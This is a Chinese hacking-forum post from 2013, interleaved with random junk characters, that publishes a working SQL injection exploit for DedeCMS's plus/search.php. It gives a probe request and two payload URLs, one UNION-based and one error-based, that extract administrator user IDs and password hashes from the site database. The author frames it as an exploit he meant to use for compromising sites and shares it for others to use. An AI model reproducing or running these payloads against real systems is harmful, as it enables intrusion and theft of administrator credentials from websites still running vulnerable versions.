转载不加作者名的没JJ
' K1 S# K$ J0 I( Y) ?1 F5 O' ^+ P6 p- ~
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。4 s) ? G* p' y- S
b: j, q: u" J; b5 ]既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
2 U$ N1 |7 J& O& W/ Q$ ?9 v1 c a0 n2 F) w6 m# |
我一般是这样测试的:
' j: s c) G) a7 c5 Z3 A; `5 A# T1 n* k, T0 R5 Q
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a( M0 J6 A% B" q* i$ C
. }/ @4 L8 ^( b5 E7 I3 M# t转载不加作者名的没JJ8 S) ^+ b. A" p
, x1 i9 `8 R+ _) y5 I
作者:鬼哥8 z b4 P. v- d' {6 G, e4 C
8 s) z7 p% ~% E5 g; S/ u. o, F$ `
" q! i1 _+ O( P G* n# y5 @* e
; z+ }3 I5 F. R0 Q% S: L
看结果如果提示1 G2 H2 {* [* \5 X. [
9 _" S4 c) J* l) |; `9 v
Safe Alert: Request Error step 2 !
) U: y) Q. C+ z9 c7 M1 Q
0 F* x, i5 T. m那么直接用下面的exp
- Y w( n, e2 v' M
. n0 X: s+ d# `2 p' [1 l2 F3 W: h" ~/ zxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
: P9 f1 a4 }8 r$ k& {! H" A
: ~# R% s8 A# I6 y1 r7 b" @; A+ ^* _0 I9 P
看结果如果提示' E2 u0 w3 J% S$ Q
- N7 p* V' K: \- \. @1 k- s5 dSafe Alert: Request Error step 1 !! l. `% x: ~' { ~
7 T+ l3 u. M( |7 \2 B8 _6 w% h
那么直接用下面的exp! f+ \! o; P0 e# q1 }1 y6 `( T
+ h U+ {+ a& `, Gxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a. [7 F- h/ P, r9 }
; L* m# H: M6 d- H
' R# v( y2 b9 a7 h2 d# n, m$ Q
如果正常显示证明漏洞不存在了。
, _9 Z8 k; U- E. }; z6 q% {% o7 q3 g5 y2 L0 ^
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对